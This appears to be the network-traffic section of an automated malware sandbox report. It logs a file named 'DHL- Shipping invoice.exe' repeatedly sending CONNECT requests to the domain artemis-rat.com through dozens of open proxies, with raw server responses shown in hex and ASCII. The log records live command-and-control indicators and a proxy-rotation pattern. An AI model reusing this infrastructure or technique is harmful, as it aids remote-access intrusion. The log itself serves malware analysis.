                            2052192.168.2.45461731.223.184.143806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.114754915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.250008106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:22.006508112 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:21 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2053192.168.2.455647154.205.152.9631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.124352932 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:11.276660919 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:12.096282959 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:13.024457932 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:14.848457098 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:18.592324018 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:26.016926050 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:40.608535051 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2054192.168.2.452697201.71.3.429996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.214071035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2055192.168.2.454824162.214.102.195342276484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.234318018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2056192.168.2.455650154.205.152.9690806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.240031958 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2057192.168.2.452658130.255.162.199520396484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.263859987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2058192.168.2.454659119.148.40.18699906484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.319506884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2059192.168.2.45478714.47.70.13780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.329464912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.453157902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2060192.168.2.4556481.15.62.1256786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.358475924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2061192.168.2.454816185.164.163.13581186484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.404445887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.089327097 CET132INHTTP/1.1 503 Too many open connections
                            Content-Type: text/plain
                            Connection: close
                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                            Data Ascii: Maximum number of open connections reached.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2062192.168.2.455651125.122.26.24210806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.588514090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2063192.168.2.452772173.212.237.43200096484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.612926006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.735964060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.750087023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.750323057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:33.750124931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:45.843641043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:57.843527079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:21.843504906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:10.031025887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2064192.168.2.455536107.152.98.541456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.612926006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2065192.168.2.45562395.71.124.18756786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.613044977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2066192.168.2.455641184.170.245.14841456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.618426085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2067192.168.2.455653154.201.66.112806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.618628025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.950138092 CET357INHTTP/1.1 400 Bat Request
                            Server: MyWebServer/3.0.37 (By TGY)
                            Date: Tue, 12 Mar 2024 07:37:10 GMT
                            Content-Type: text/html; Charset=GB2312
                            Content-Length: 169
                            Connection: Keep-Alive
                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 74 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 74 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3a 34 34 33 3c 68 72 3e 3c 68 33 3e 4d 79 57 65 62 53 65 72 76 65 72 2f 33 2e 30 2e 33 37 20 28 42 79 20 54 47 59 29 3c 2f 68 33 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                            Data Ascii: <html><head><title>400 Bat Request</title></head><body><center><h1>400 Bat Request</h1>artemis-rat.com:443<hr><h3>MyWebServer/3.0.37 (By TGY)</h3></center></body></html>
                            Mar 12, 2024 08:37:10.176594973 CET1INData Raw: 6d
                            Data Ascii: m


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2068192.168.2.455655131.196.212.172806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.618885994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2069192.168.2.455654103.200.135.22841456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.699920893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2070192.168.2.454987120.28.195.4082826484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.699954987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.736205101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.750085115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.678013086 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2071192.168.2.45513046.98.192.23356786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.738274097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.843503952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2072192.168.2.455045163.172.165.36163796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.750531912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.751096964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.859468937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.859476089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:34.062386036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:46.156049013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:58.249825954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:22.249850988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:10.265397072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2073192.168.2.45565938.54.6.3990806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.768177032 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:11.864903927 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2074192.168.2.455157162.214.121.173351836484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.770365000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.859157085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.859853029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2075192.168.2.455237162.240.79.122617926484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.773633003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.859194040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2076192.168.2.45531151.158.108.165163796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.822118998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.843852997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.953289032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.953213930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:33.952934980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:45.952904940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:57.953067064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:21.952887058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:24.317795038 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


